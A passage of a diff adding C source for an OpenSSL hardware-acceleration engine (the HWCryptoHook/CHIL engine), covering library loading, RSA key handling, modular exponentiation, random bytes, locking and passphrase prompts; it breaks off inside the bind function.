+#  ifndef OPENSSL_NO_RSA
+static HWCryptoHook_RSALoadKey_t *p_hwcrhk_RSALoadKey = NULL;
+static HWCryptoHook_RSAGetPublicKey_t *p_hwcrhk_RSAGetPublicKey = NULL;
+static HWCryptoHook_RSAUnloadKey_t *p_hwcrhk_RSAUnloadKey = NULL;
+#  endif
+static HWCryptoHook_ModExpCRT_t *p_hwcrhk_ModExpCRT = NULL;
+
+/* Used in the DSO operations. */
+static const char *HWCRHK_LIBNAME = NULL;
+static void free_HWCRHK_LIBNAME(void)
+{
+    if (HWCRHK_LIBNAME)
+        OPENSSL_free((void *)HWCRHK_LIBNAME);
+    HWCRHK_LIBNAME = NULL;
+}
+
+static const char *get_HWCRHK_LIBNAME(void)
+{
+    if (HWCRHK_LIBNAME)
+        return HWCRHK_LIBNAME;
+    return "nfhwcrhk";
+}
+
+static long set_HWCRHK_LIBNAME(const char *name)
+{
+    free_HWCRHK_LIBNAME();
+    return (((HWCRHK_LIBNAME = BUF_strdup(name)) != NULL) ? 1 : 0);
+}
+
+static const char *n_hwcrhk_Init = "HWCryptoHook_Init";
+static const char *n_hwcrhk_Finish = "HWCryptoHook_Finish";
+static const char *n_hwcrhk_ModExp = "HWCryptoHook_ModExp";
+#  ifndef OPENSSL_NO_RSA
+static const char *n_hwcrhk_RSA = "HWCryptoHook_RSA";
+#  endif
+static const char *n_hwcrhk_RandomBytes = "HWCryptoHook_RandomBytes";
+#  ifndef OPENSSL_NO_RSA
+static const char *n_hwcrhk_RSALoadKey = "HWCryptoHook_RSALoadKey";
+static const char *n_hwcrhk_RSAGetPublicKey = "HWCryptoHook_RSAGetPublicKey";
+static const char *n_hwcrhk_RSAUnloadKey = "HWCryptoHook_RSAUnloadKey";
+#  endif
+static const char *n_hwcrhk_ModExpCRT = "HWCryptoHook_ModExpCRT";
+
+/*
+ * HWCryptoHook library functions and mechanics - these are used by the
+ * higher-level functions further down. NB: As and where there's no error
+ * checking, take a look lower down where these functions are called, the
+ * checking and error handling is probably down there.
+ */
+
+/* utility function to obtain a context */
+static int get_context(HWCryptoHook_ContextHandle * hac,
+                       HWCryptoHook_CallerContext * cac)
+{
+    char tempbuf[1024];
+    HWCryptoHook_ErrMsgBuf rmsg;
+
+    rmsg.buf = tempbuf;
+    rmsg.size = sizeof(tempbuf);
+
+    *hac = p_hwcrhk_Init(&hwcrhk_globals, sizeof(hwcrhk_globals), &rmsg, cac);
+    if (!*hac)
+        return 0;
+    return 1;
+}
+
+/* similarly to release one. */
+static void release_context(HWCryptoHook_ContextHandle hac)
+{
+    p_hwcrhk_Finish(hac);
+}
+
+/* Destructor (complements the "ENGINE_chil()" constructor) */
+static int hwcrhk_destroy(ENGINE *e)
+{
+    free_HWCRHK_LIBNAME();
+    ERR_unload_HWCRHK_strings();
+    return 1;
+}
+
+/* (de)initialisation functions. */
+static int hwcrhk_init(ENGINE *e)
+{
+    HWCryptoHook_Init_t *p1;
+    HWCryptoHook_Finish_t *p2;
+    HWCryptoHook_ModExp_t *p3;
+#  ifndef OPENSSL_NO_RSA
+    HWCryptoHook_RSA_t *p4;
+    HWCryptoHook_RSALoadKey_t *p5;
+    HWCryptoHook_RSAGetPublicKey_t *p6;
+    HWCryptoHook_RSAUnloadKey_t *p7;
+#  endif
+    HWCryptoHook_RandomBytes_t *p8;
+    HWCryptoHook_ModExpCRT_t *p9;
+
+    if (hwcrhk_dso != NULL) {
+        HWCRHKerr(HWCRHK_F_HWCRHK_INIT, HWCRHK_R_ALREADY_LOADED);
+        goto err;
+    }
+    /* Attempt to load libnfhwcrhk.so/nfhwcrhk.dll/whatever. */
+    hwcrhk_dso = DSO_load(NULL, get_HWCRHK_LIBNAME(), NULL, 0);
+    if (hwcrhk_dso == NULL) {
+        HWCRHKerr(HWCRHK_F_HWCRHK_INIT, HWCRHK_R_DSO_FAILURE);
+        goto err;
+    }
+    if (!(p1 = (HWCryptoHook_Init_t *)
+          DSO_bind_func(hwcrhk_dso, n_hwcrhk_Init)) ||
+        !(p2 = (HWCryptoHook_Finish_t *)
+          DSO_bind_func(hwcrhk_dso, n_hwcrhk_Finish)) ||
+        !(p3 = (HWCryptoHook_ModExp_t *)
+          DSO_bind_func(hwcrhk_dso, n_hwcrhk_ModExp)) ||
+#  ifndef OPENSSL_NO_RSA
+        !(p4 = (HWCryptoHook_RSA_t *)
+          DSO_bind_func(hwcrhk_dso, n_hwcrhk_RSA)) ||
+        !(p5 = (HWCryptoHook_RSALoadKey_t *)
+          DSO_bind_func(hwcrhk_dso, n_hwcrhk_RSALoadKey)) ||
+        !(p6 = (HWCryptoHook_RSAGetPublicKey_t *)
+          DSO_bind_func(hwcrhk_dso, n_hwcrhk_RSAGetPublicKey)) ||
+        !(p7 = (HWCryptoHook_RSAUnloadKey_t *)
+          DSO_bind_func(hwcrhk_dso, n_hwcrhk_RSAUnloadKey)) ||
+#  endif
+        !(p8 = (HWCryptoHook_RandomBytes_t *)
+          DSO_bind_func(hwcrhk_dso, n_hwcrhk_RandomBytes)) ||
+        !(p9 = (HWCryptoHook_ModExpCRT_t *)
+          DSO_bind_func(hwcrhk_dso, n_hwcrhk_ModExpCRT))) {
+        HWCRHKerr(HWCRHK_F_HWCRHK_INIT, HWCRHK_R_DSO_FAILURE);
+        goto err;
+    }
+    /* Copy the pointers */
+    p_hwcrhk_Init = p1;
+    p_hwcrhk_Finish = p2;
+    p_hwcrhk_ModExp = p3;
+#  ifndef OPENSSL_NO_RSA
+    p_hwcrhk_RSA = p4;
+    p_hwcrhk_RSALoadKey = p5;
+    p_hwcrhk_RSAGetPublicKey = p6;
+    p_hwcrhk_RSAUnloadKey = p7;
+#  endif
+    p_hwcrhk_RandomBytes = p8;
+    p_hwcrhk_ModExpCRT = p9;
+
+    /*
+     * Check if the application decided to support dynamic locks, and if it
+     * does, use them.
+     */
+    if (disable_mutex_callbacks == 0) {
+        if (CRYPTO_get_dynlock_create_callback() != NULL &&
+            CRYPTO_get_dynlock_lock_callback() != NULL &&
+            CRYPTO_get_dynlock_destroy_callback() != NULL) {
+            hwcrhk_globals.mutex_init = hwcrhk_mutex_init;
+            hwcrhk_globals.mutex_acquire = hwcrhk_mutex_lock;
+            hwcrhk_globals.mutex_release = hwcrhk_mutex_unlock;
+            hwcrhk_globals.mutex_destroy = hwcrhk_mutex_destroy;
+        }
+    }
+
+    /*
+     * Try and get a context - if not, we may have a DSO but no accelerator!
+     */
+    if (!get_context(&hwcrhk_context, &password_context)) {
+        HWCRHKerr(HWCRHK_F_HWCRHK_INIT, HWCRHK_R_UNIT_FAILURE);
+        goto err;
+    }
+    /* Everything's fine. */
+#  ifndef OPENSSL_NO_RSA
+    if (hndidx_rsa == -1)
+        hndidx_rsa = RSA_get_ex_new_index(0,
+                                          "nFast HWCryptoHook RSA key handle",
+                                          NULL, NULL, NULL);
+#  endif
+    return 1;
+ err:
+    if (hwcrhk_dso)
+        DSO_free(hwcrhk_dso);
+    hwcrhk_dso = NULL;
+    p_hwcrhk_Init = NULL;
+    p_hwcrhk_Finish = NULL;
+    p_hwcrhk_ModExp = NULL;
+#  ifndef OPENSSL_NO_RSA
+    p_hwcrhk_RSA = NULL;
+    p_hwcrhk_RSALoadKey = NULL;
+    p_hwcrhk_RSAGetPublicKey = NULL;
+    p_hwcrhk_RSAUnloadKey = NULL;
+#  endif
+    p_hwcrhk_ModExpCRT = NULL;
+    p_hwcrhk_RandomBytes = NULL;
+    return 0;
+}
+
+static int hwcrhk_finish(ENGINE *e)
+{
+    int to_return = 1;
+    free_HWCRHK_LIBNAME();
+    if (hwcrhk_dso == NULL) {
+        HWCRHKerr(HWCRHK_F_HWCRHK_FINISH, HWCRHK_R_NOT_LOADED);
+        to_return = 0;
+        goto err;
+    }
+    release_context(hwcrhk_context);
+    if (!DSO_free(hwcrhk_dso)) {
+        HWCRHKerr(HWCRHK_F_HWCRHK_FINISH, HWCRHK_R_DSO_FAILURE);
+        to_return = 0;
+        goto err;
+    }
+ err:
+    if (logstream)
+        BIO_free(logstream);
+    hwcrhk_dso = NULL;
+    p_hwcrhk_Init = NULL;
+    p_hwcrhk_Finish = NULL;
+    p_hwcrhk_ModExp = NULL;
+#  ifndef OPENSSL_NO_RSA
+    p_hwcrhk_RSA = NULL;
+    p_hwcrhk_RSALoadKey = NULL;
+    p_hwcrhk_RSAGetPublicKey = NULL;
+    p_hwcrhk_RSAUnloadKey = NULL;
+#  endif
+    p_hwcrhk_ModExpCRT = NULL;
+    p_hwcrhk_RandomBytes = NULL;
+    return to_return;
+}
+
+static int hwcrhk_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) (void))
+{
+    int to_return = 1;
+
+    switch (cmd) {
+    case HWCRHK_CMD_SO_PATH:
+        if (hwcrhk_dso) {
+            HWCRHKerr(HWCRHK_F_HWCRHK_CTRL, HWCRHK_R_ALREADY_LOADED);
+            return 0;
+        }
+        if (p == NULL) {
+            HWCRHKerr(HWCRHK_F_HWCRHK_CTRL, ERR_R_PASSED_NULL_PARAMETER);
+            return 0;
+        }
+        return set_HWCRHK_LIBNAME((const char *)p);
+    case ENGINE_CTRL_SET_LOGSTREAM:
+        {
+            BIO *bio = (BIO *)p;
+
+            CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+            if (logstream) {
+                BIO_free(logstream);
+                logstream = NULL;
+            }
+            if (CRYPTO_add(&bio->references, 1, CRYPTO_LOCK_BIO) > 1)
+                logstream = bio;
+            else
+                HWCRHKerr(HWCRHK_F_HWCRHK_CTRL, HWCRHK_R_BIO_WAS_FREED);
+        }
+        CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+        break;
+    case ENGINE_CTRL_SET_PASSWORD_CALLBACK:
+        CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+        password_context.password_callback = (pem_password_cb *)f;
+        CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+        break;
+    case ENGINE_CTRL_SET_USER_INTERFACE:
+    case HWCRHK_CMD_SET_USER_INTERFACE:
+        CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+        password_context.ui_method = (UI_METHOD *)p;
+        CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+        break;
+    case ENGINE_CTRL_SET_CALLBACK_DATA:
+    case HWCRHK_CMD_SET_CALLBACK_DATA:
+        CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+        password_context.callback_data = p;
+        CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+        break;
+        /*
+         * this enables or disables the "SimpleForkCheck" flag used in the
+         * initialisation structure.
+         */
+    case ENGINE_CTRL_CHIL_SET_FORKCHECK:
+    case HWCRHK_CMD_FORK_CHECK:
+        CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+        if (i)
+            hwcrhk_globals.flags |= HWCryptoHook_InitFlags_SimpleForkCheck;
+        else
+            hwcrhk_globals.flags &= ~HWCryptoHook_InitFlags_SimpleForkCheck;
+        CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+        break;
+        /*
+         * This will prevent the initialisation function from "installing"
+         * the mutex-handling callbacks, even if they are available from
+         * within the library (or were provided to the library from the
+         * calling application). This is to remove any baggage for
+         * applications not using multithreading.
+         */
+    case ENGINE_CTRL_CHIL_NO_LOCKING:
+        CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+        disable_mutex_callbacks = 1;
+        CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+        break;
+    case HWCRHK_CMD_THREAD_LOCKING:
+        CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+        disable_mutex_callbacks = ((i == 0) ? 0 : 1);
+        CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+        break;
+
+        /* The command isn't understood by this engine */
+    default:
+        HWCRHKerr(HWCRHK_F_HWCRHK_CTRL,
+                  HWCRHK_R_CTRL_COMMAND_NOT_IMPLEMENTED);
+        to_return = 0;
+        break;
+    }
+
+    return to_return;
+}
+
+static EVP_PKEY *hwcrhk_load_privkey(ENGINE *eng, const char *key_id,
+                                     UI_METHOD *ui_method,
+                                     void *callback_data)
+{
+#  ifndef OPENSSL_NO_RSA
+    RSA *rtmp = NULL;
+#  endif
+    EVP_PKEY *res = NULL;
+#  ifndef OPENSSL_NO_RSA
+    HWCryptoHook_MPI e, n;
+    HWCryptoHook_RSAKeyHandle *hptr;
+#  endif
+#  if !defined(OPENSSL_NO_RSA)
+    char tempbuf[1024];
+    HWCryptoHook_ErrMsgBuf rmsg;
+    HWCryptoHook_PassphraseContext ppctx;
+#  endif
+
+#  if !defined(OPENSSL_NO_RSA)
+    rmsg.buf = tempbuf;
+    rmsg.size = sizeof(tempbuf);
+#  endif
+
+    if (!hwcrhk_context) {
+        HWCRHKerr(HWCRHK_F_HWCRHK_LOAD_PRIVKEY, HWCRHK_R_NOT_INITIALISED);
+        goto err;
+    }
+#  ifndef OPENSSL_NO_RSA
+    hptr = OPENSSL_malloc(sizeof(HWCryptoHook_RSAKeyHandle));
+    if (!hptr) {
+        HWCRHKerr(HWCRHK_F_HWCRHK_LOAD_PRIVKEY, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    ppctx.ui_method = ui_method;
+    ppctx.callback_data = callback_data;
+    if (p_hwcrhk_RSALoadKey(hwcrhk_context, key_id, hptr, &rmsg, &ppctx)) {
+        HWCRHKerr(HWCRHK_F_HWCRHK_LOAD_PRIVKEY, HWCRHK_R_CHIL_ERROR);
+        ERR_add_error_data(1, rmsg.buf);
+        goto err;
+    }
+    if (!*hptr) {
+        HWCRHKerr(HWCRHK_F_HWCRHK_LOAD_PRIVKEY, HWCRHK_R_NO_KEY);
+        goto err;
+    }
+#  endif
+#  ifndef OPENSSL_NO_RSA
+    rtmp = RSA_new_method(eng);
+    RSA_set_ex_data(rtmp, hndidx_rsa, (char *)hptr);
+    rtmp->e = BN_new();
+    rtmp->n = BN_new();
+    rtmp->flags |= RSA_FLAG_EXT_PKEY;
+    MPI2BN(rtmp->e, e);
+    MPI2BN(rtmp->n, n);
+    if (p_hwcrhk_RSAGetPublicKey(*hptr, &n, &e, &rmsg)
+        != HWCRYPTOHOOK_ERROR_MPISIZE) {
+        HWCRHKerr(HWCRHK_F_HWCRHK_LOAD_PRIVKEY, HWCRHK_R_CHIL_ERROR);
+        ERR_add_error_data(1, rmsg.buf);
+        goto err;
+    }
+
+    bn_expand2(rtmp->e, e.size / sizeof(BN_ULONG));
+    bn_expand2(rtmp->n, n.size / sizeof(BN_ULONG));
+    MPI2BN(rtmp->e, e);
+    MPI2BN(rtmp->n, n);
+
+    if (p_hwcrhk_RSAGetPublicKey(*hptr, &n, &e, &rmsg)) {
+        HWCRHKerr(HWCRHK_F_HWCRHK_LOAD_PRIVKEY, HWCRHK_R_CHIL_ERROR);
+        ERR_add_error_data(1, rmsg.buf);
+        goto err;
+    }
+    rtmp->e->top = e.size / sizeof(BN_ULONG);
+    bn_fix_top(rtmp->e);
+    rtmp->n->top = n.size / sizeof(BN_ULONG);
+    bn_fix_top(rtmp->n);
+
+    res = EVP_PKEY_new();
+    EVP_PKEY_assign_RSA(res, rtmp);
+#  endif
+
+    if (!res)
+        HWCRHKerr(HWCRHK_F_HWCRHK_LOAD_PRIVKEY,
+                  HWCRHK_R_PRIVATE_KEY_ALGORITHMS_DISABLED);
+
+    return res;
+ err:
+#  ifndef OPENSSL_NO_RSA
+    if (rtmp)
+        RSA_free(rtmp);
+#  endif
+    return NULL;
+}
+
+static EVP_PKEY *hwcrhk_load_pubkey(ENGINE *eng, const char *key_id,
+                                    UI_METHOD *ui_method, void *callback_data)
+{
+    EVP_PKEY *res = NULL;
+
+#  ifndef OPENSSL_NO_RSA
+    res = hwcrhk_load_privkey(eng, key_id, ui_method, callback_data);
+#  endif
+
+    if (res)
+        switch (res->type) {
+#  ifndef OPENSSL_NO_RSA
+        case EVP_PKEY_RSA:
+            {
+                RSA *rsa = NULL;
+
+                CRYPTO_w_lock(CRYPTO_LOCK_EVP_PKEY);
+                rsa = res->pkey.rsa;
+                res->pkey.rsa = RSA_new();
+                res->pkey.rsa->n = rsa->n;
+                res->pkey.rsa->e = rsa->e;
+                rsa->n = NULL;
+                rsa->e = NULL;
+                CRYPTO_w_unlock(CRYPTO_LOCK_EVP_PKEY);
+                RSA_free(rsa);
+            }
+            break;
+#  endif
+        default:
+            HWCRHKerr(HWCRHK_F_HWCRHK_LOAD_PUBKEY,
+                      HWCRHK_R_CTRL_COMMAND_NOT_IMPLEMENTED);
+            goto err;
+        }
+
+    return res;
+ err:
+    if (res)
+        EVP_PKEY_free(res);
+    return NULL;
+}
+
+/* A little mod_exp */
+static int hwcrhk_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                          const BIGNUM *m, BN_CTX *ctx)
+{
+    char tempbuf[1024];
+    HWCryptoHook_ErrMsgBuf rmsg;
+    /*
+     * Since HWCryptoHook_MPI is pretty compatible with BIGNUM's, we use them
+     * directly, plus a little macro magic.  We only thing we need to make
+     * sure of is that enough space is allocated.
+     */
+    HWCryptoHook_MPI m_a, m_p, m_n, m_r;
+    int to_return, ret;
+
+    to_return = 0;              /* expect failure */
+    rmsg.buf = tempbuf;
+    rmsg.size = sizeof(tempbuf);
+
+    if (!hwcrhk_context) {
+        HWCRHKerr(HWCRHK_F_HWCRHK_MOD_EXP, HWCRHK_R_NOT_INITIALISED);
+        goto err;
+    }
+    /* Prepare the params */
+    bn_expand2(r, m->top);      /* Check for error !! */
+    BN2MPI(m_a, a);
+    BN2MPI(m_p, p);
+    BN2MPI(m_n, m);
+    MPI2BN(r, m_r);
+
+    /* Perform the operation */
+    ret = p_hwcrhk_ModExp(hwcrhk_context, m_a, m_p, m_n, &m_r, &rmsg);
+
+    /* Convert the response */
+    r->top = m_r.size / sizeof(BN_ULONG);
+    bn_fix_top(r);
+
+    if (ret < 0) {
+        /*
+         * FIXME: When this error is returned, HWCryptoHook is telling us
+         * that falling back to software computation might be a good thing.
+         */
+        if (ret == HWCRYPTOHOOK_ERROR_FALLBACK) {
+            HWCRHKerr(HWCRHK_F_HWCRHK_MOD_EXP, HWCRHK_R_REQUEST_FALLBACK);
+        } else {
+            HWCRHKerr(HWCRHK_F_HWCRHK_MOD_EXP, HWCRHK_R_REQUEST_FAILED);
+        }
+        ERR_add_error_data(1, rmsg.buf);
+        goto err;
+    }
+
+    to_return = 1;
+ err:
+    return to_return;
+}
+
+#  ifndef OPENSSL_NO_RSA
+static int hwcrhk_rsa_mod_exp(BIGNUM *r, const BIGNUM *I, RSA *rsa,
+                              BN_CTX *ctx)
+{
+    char tempbuf[1024];
+    HWCryptoHook_ErrMsgBuf rmsg;
+    HWCryptoHook_RSAKeyHandle *hptr;
+    int to_return = 0, ret;
+
+    rmsg.buf = tempbuf;
+    rmsg.size = sizeof(tempbuf);
+
+    if (!hwcrhk_context) {
+        HWCRHKerr(HWCRHK_F_HWCRHK_RSA_MOD_EXP, HWCRHK_R_NOT_INITIALISED);
+        goto err;
+    }
+
+    /*
+     * This provides support for nForce keys.  Since that's opaque data all
+     * we do is provide a handle to the proper key and let HWCryptoHook take
+     * care of the rest.
+     */
+    if ((hptr =
+         (HWCryptoHook_RSAKeyHandle *) RSA_get_ex_data(rsa, hndidx_rsa))
+        != NULL) {
+        HWCryptoHook_MPI m_a, m_r;
+
+        if (!rsa->n) {
+            HWCRHKerr(HWCRHK_F_HWCRHK_RSA_MOD_EXP,
+                      HWCRHK_R_MISSING_KEY_COMPONENTS);
+            goto err;
+        }
+
+        /* Prepare the params */
+        bn_expand2(r, rsa->n->top); /* Check for error !! */
+        BN2MPI(m_a, I);
+        MPI2BN(r, m_r);
+
+        /* Perform the operation */
+        ret = p_hwcrhk_RSA(m_a, *hptr, &m_r, &rmsg);
+
+        /* Convert the response */
+        r->top = m_r.size / sizeof(BN_ULONG);
+        bn_fix_top(r);
+
+        if (ret < 0) {
+            /*
+             * FIXME: When this error is returned, HWCryptoHook is telling us
+             * that falling back to software computation might be a good
+             * thing.
+             */
+            if (ret == HWCRYPTOHOOK_ERROR_FALLBACK) {
+                HWCRHKerr(HWCRHK_F_HWCRHK_RSA_MOD_EXP,
+                          HWCRHK_R_REQUEST_FALLBACK);
+            } else {
+                HWCRHKerr(HWCRHK_F_HWCRHK_RSA_MOD_EXP,
+                          HWCRHK_R_REQUEST_FAILED);
+            }
+            ERR_add_error_data(1, rmsg.buf);
+            goto err;
+        }
+    } else {
+        HWCryptoHook_MPI m_a, m_p, m_q, m_dmp1, m_dmq1, m_iqmp, m_r;
+
+        if (!rsa->p || !rsa->q || !rsa->dmp1 || !rsa->dmq1 || !rsa->iqmp) {
+            HWCRHKerr(HWCRHK_F_HWCRHK_RSA_MOD_EXP,
+                      HWCRHK_R_MISSING_KEY_COMPONENTS);
+            goto err;
+        }
+
+        /* Prepare the params */
+        bn_expand2(r, rsa->n->top); /* Check for error !! */
+        BN2MPI(m_a, I);
+        BN2MPI(m_p, rsa->p);
+        BN2MPI(m_q, rsa->q);
+        BN2MPI(m_dmp1, rsa->dmp1);
+        BN2MPI(m_dmq1, rsa->dmq1);
+        BN2MPI(m_iqmp, rsa->iqmp);
+        MPI2BN(r, m_r);
+
+        /* Perform the operation */
+        ret = p_hwcrhk_ModExpCRT(hwcrhk_context, m_a, m_p, m_q,
+                                 m_dmp1, m_dmq1, m_iqmp, &m_r, &rmsg);
+
+        /* Convert the response */
+        r->top = m_r.size / sizeof(BN_ULONG);
+        bn_fix_top(r);
+
+        if (ret < 0) {
+            /*
+             * FIXME: When this error is returned, HWCryptoHook is telling us
+             * that falling back to software computation might be a good
+             * thing.
+             */
+            if (ret == HWCRYPTOHOOK_ERROR_FALLBACK) {
+                HWCRHKerr(HWCRHK_F_HWCRHK_RSA_MOD_EXP,
+                          HWCRHK_R_REQUEST_FALLBACK);
+            } else {
+                HWCRHKerr(HWCRHK_F_HWCRHK_RSA_MOD_EXP,
+                          HWCRHK_R_REQUEST_FAILED);
+            }
+            ERR_add_error_data(1, rmsg.buf);
+            goto err;
+        }
+    }
+    /*
+     * If we're here, we must be here with some semblance of success :-)
+     */
+    to_return = 1;
+ err:
+    return to_return;
+}
+#  endif
+
+#  ifndef OPENSSL_NO_RSA
+/* This function is aliased to mod_exp (with the mont stuff dropped). */
+static int hwcrhk_mod_exp_mont(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                               const BIGNUM *m, BN_CTX *ctx,
+                               BN_MONT_CTX *m_ctx)
+{
+    return hwcrhk_mod_exp(r, a, p, m, ctx);
+}
+
+static int hwcrhk_rsa_finish(RSA *rsa)
+{
+    HWCryptoHook_RSAKeyHandle *hptr;
+
+    hptr = RSA_get_ex_data(rsa, hndidx_rsa);
+    if (hptr) {
+        p_hwcrhk_RSAUnloadKey(*hptr, NULL);
+        OPENSSL_free(hptr);
+        RSA_set_ex_data(rsa, hndidx_rsa, NULL);
+    }
+    return 1;
+}
+
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+/* This function is aliased to mod_exp (with the dh and mont dropped). */
+static int hwcrhk_mod_exp_dh(const DH *dh, BIGNUM *r,
+                             const BIGNUM *a, const BIGNUM *p,
+                             const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx)
+{
+    return hwcrhk_mod_exp(r, a, p, m, ctx);
+}
+#  endif
+
+/* Random bytes are good */
+static int hwcrhk_rand_bytes(unsigned char *buf, int num)
+{
+    char tempbuf[1024];
+    HWCryptoHook_ErrMsgBuf rmsg;
+    int to_return = 0;          /* assume failure */
+    int ret;
+
+    rmsg.buf = tempbuf;
+    rmsg.size = sizeof(tempbuf);
+
+    if (!hwcrhk_context) {
+        HWCRHKerr(HWCRHK_F_HWCRHK_RAND_BYTES, HWCRHK_R_NOT_INITIALISED);
+        goto err;
+    }
+
+    ret = p_hwcrhk_RandomBytes(hwcrhk_context, buf, num, &rmsg);
+    if (ret < 0) {
+        /*
+         * FIXME: When this error is returned, HWCryptoHook is telling us
+         * that falling back to software computation might be a good thing.
+         */
+        if (ret == HWCRYPTOHOOK_ERROR_FALLBACK) {
+            HWCRHKerr(HWCRHK_F_HWCRHK_RAND_BYTES, HWCRHK_R_REQUEST_FALLBACK);
+        } else {
+            HWCRHKerr(HWCRHK_F_HWCRHK_RAND_BYTES, HWCRHK_R_REQUEST_FAILED);
+        }
+        ERR_add_error_data(1, rmsg.buf);
+        goto err;
+    }
+    to_return = 1;
+ err:
+    return to_return;
+}
+
+static int hwcrhk_rand_status(void)
+{
+    return 1;
+}
+
+/*
+ * Mutex calls: since the HWCryptoHook model closely follows the POSIX model
+ * these just wrap the POSIX functions and add some logging.
+ */
+
+static int hwcrhk_mutex_init(HWCryptoHook_Mutex * mt,
+                             HWCryptoHook_CallerContext * cactx)
+{
+    mt->lockid = CRYPTO_get_new_dynlockid();
+    if (mt->lockid == 0)
+        return 1;               /* failure */
+    return 0;                   /* success */
+}
+
+static int hwcrhk_mutex_lock(HWCryptoHook_Mutex * mt)
+{
+    CRYPTO_w_lock(mt->lockid);
+    return 0;
+}
+
+static void hwcrhk_mutex_unlock(HWCryptoHook_Mutex * mt)
+{
+    CRYPTO_w_unlock(mt->lockid);
+}
+
+static void hwcrhk_mutex_destroy(HWCryptoHook_Mutex * mt)
+{
+    CRYPTO_destroy_dynlockid(mt->lockid);
+}
+
+static int hwcrhk_get_pass(const char *prompt_info,
+                           int *len_io, char *buf,
+                           HWCryptoHook_PassphraseContext * ppctx,
+                           HWCryptoHook_CallerContext * cactx)
+{
+    pem_password_cb *callback = NULL;
+    void *callback_data = NULL;
+    UI_METHOD *ui_method = NULL;
+    /*
+     * Despite what the documentation says prompt_info can be an empty
+     * string.
+     */
+    if (prompt_info && !*prompt_info)
+        prompt_info = NULL;
+
+    if (cactx) {
+        if (cactx->ui_method)
+            ui_method = cactx->ui_method;
+        if (cactx->password_callback)
+            callback = cactx->password_callback;
+        if (cactx->callback_data)
+            callback_data = cactx->callback_data;
+    }
+    if (ppctx) {
+        if (ppctx->ui_method) {
+            ui_method = ppctx->ui_method;
+            callback = NULL;
+        }
+        if (ppctx->callback_data)
+            callback_data = ppctx->callback_data;
+    }
+    if (callback == NULL && ui_method == NULL) {
+        HWCRHKerr(HWCRHK_F_HWCRHK_GET_PASS, HWCRHK_R_NO_CALLBACK);
+        return -1;
+    }
+
+    if (ui_method) {
+        UI *ui = UI_new_method(ui_method);
+        if (ui) {
+            int ok;
+            char *prompt = UI_construct_prompt(ui,
+                                               "pass phrase", prompt_info);
+
+            ok = UI_add_input_string(ui, prompt,
+                                     UI_INPUT_FLAG_DEFAULT_PWD,
+                                     buf, 0, (*len_io) - 1);
+            UI_add_user_data(ui, callback_data);
+            UI_ctrl(ui, UI_CTRL_PRINT_ERRORS, 1, 0, 0);
+
+            if (ok >= 0)
+                do {
+                    ok = UI_process(ui);
+                }
+                while (ok < 0 && UI_ctrl(ui, UI_CTRL_IS_REDOABLE, 0, 0, 0));
+
+            if (ok >= 0)
+                *len_io = strlen(buf);
+
+            UI_free(ui);
+            OPENSSL_free(prompt);
+        }
+    } else {
+        *len_io = callback(buf, *len_io, 0, callback_data);
+    }
+    if (!*len_io)
+        return -1;
+    return 0;
+}
+
+static int hwcrhk_insert_card(const char *prompt_info,
+                              const char *wrong_info,
+                              HWCryptoHook_PassphraseContext * ppctx,
+                              HWCryptoHook_CallerContext * cactx)
+{
+    int ok = -1;
+    UI *ui;
+    void *callback_data = NULL;
+    UI_METHOD *ui_method = NULL;
+
+    if (cactx) {
+        if (cactx->ui_method)
+            ui_method = cactx->ui_method;
+        if (cactx->callback_data)
+            callback_data = cactx->callback_data;
+    }
+    if (ppctx) {
+        if (ppctx->ui_method)
+            ui_method = ppctx->ui_method;
+        if (ppctx->callback_data)
+            callback_data = ppctx->callback_data;
+    }
+    if (ui_method == NULL) {
+        HWCRHKerr(HWCRHK_F_HWCRHK_INSERT_CARD, HWCRHK_R_NO_CALLBACK);
+        return -1;
+    }
+
+    ui = UI_new_method(ui_method);
+
+    if (ui) {
+        char answer;
+        char buf[BUFSIZ];
+        /*
+         * Despite what the documentation says wrong_info can be an empty
+         * string.
+         */
+        if (wrong_info && *wrong_info)
+            BIO_snprintf(buf, sizeof(buf) - 1,
+                         "Current card: \"%s\"\n", wrong_info);
+        else
+            buf[0] = 0;
+        ok = UI_dup_info_string(ui, buf);
+        if (ok >= 0 && prompt_info) {
+            BIO_snprintf(buf, sizeof(buf) - 1,
+                         "Insert card \"%s\"", prompt_info);
+            ok = UI_dup_input_boolean(ui, buf,
+                                      "\n then hit <enter> or C<enter> to cancel\n",
+                                      "\r\n", "Cc", UI_INPUT_FLAG_ECHO,
+                                      &answer);
+        }
+        UI_add_user_data(ui, callback_data);
+
+        if (ok >= 0)
+            ok = UI_process(ui);
+        UI_free(ui);
+
+        if (ok == -2 || (ok >= 0 && answer == 'C'))
+            ok = 1;
+        else if (ok < 0)
+            ok = -1;
+        else
+            ok = 0;
+    }
+    return ok;
+}
+
+static void hwcrhk_log_message(void *logstr, const char *message)
+{
+    BIO *lstream = NULL;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_BIO);
+    if (logstr)
+        lstream = *(BIO **)logstr;
+    if (lstream) {
+        BIO_printf(lstream, "%s\n", message);
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_BIO);
+}
+
+/*
+ * This stuff is needed if this ENGINE is being compiled into a
+ * self-contained shared-library.
+ */
+#  ifndef OPENSSL_NO_DYNAMIC_ENGINE
+static int bind_fn(ENGINE *e, const char *id)
+{
+    if (id && (strcmp(id, engine_hwcrhk_id) != 0) &&
+        (strcmp(id, engine_hwcrhk_id_alt) != 0))
+        return 0;
+    if (!bind_helper(e))
